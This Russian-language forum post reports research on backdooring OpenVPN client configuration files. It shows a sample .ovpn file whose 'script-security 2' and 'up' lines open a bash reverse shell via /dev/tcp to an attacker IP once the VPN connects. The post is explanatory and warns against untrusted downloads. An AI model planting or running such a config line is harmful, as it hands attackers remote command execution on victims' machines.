Файлы конфигурации клиента OpenVPN могут использоваться для установки бэкдоров

  • Автор темы Clays
  • Дата начала
  • Просмотров 8272 Просмотров

Clays

Местный
113
116
27 Фев 2018
Атакующий может превратить безопасный конфигурационный файл во вредоносный, добавив всего несколько строк кода.

Специалисты в области кибербезопасности неоднократно предупреждали о рисках загрузки контента из непроверенных источников, поскольку многие из таких файлов могут содержать вредоносный код, нежелательное рекламное ПО или скрипты, осуществляющие вредоносную деятельность на компьютере. Исследователь Джейкоб Бэйнс (Jacob Baines) продемонстрировал, как простой конфигурационный файл (.ovpn) клиента OpenVPN может использоваться для выполнения команд на компьютере после установки VPN-соединения.

Согласно Бэйнсу, для превращения безопасного конфигурационного файла во вредоносный злоумышленникам потребуется всего лишь добавить несколько строк кода. В примере исследователя, конфигурационный файл имеет следующий вид:
Код:
remote 192.168.1.245        ifconfig 10.200.0.2 10.200.0.1        dev tun
Если злоумышленнику требуется выполнить команду, он может добавить строку script-security 2 (разрешает OpenVPN выполнять пользовательские скрипты) и запись "up", содержащую команду, которая выполнится после установки соединения.
Код:
remote 192.168.1.245         ifconfig 10.200.0.2 10.200.0.1         dev tun         script-security 2         up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”
Таким образом атакующий получит возможность удаленно выполнить команды на компьютере с запущенным файлом конфигурации OpenVPN.
По словам эксперта, данный метод также может использоваться для атак на пользователей компьютеров под управлением Windows с помощью скрипта PowerShell.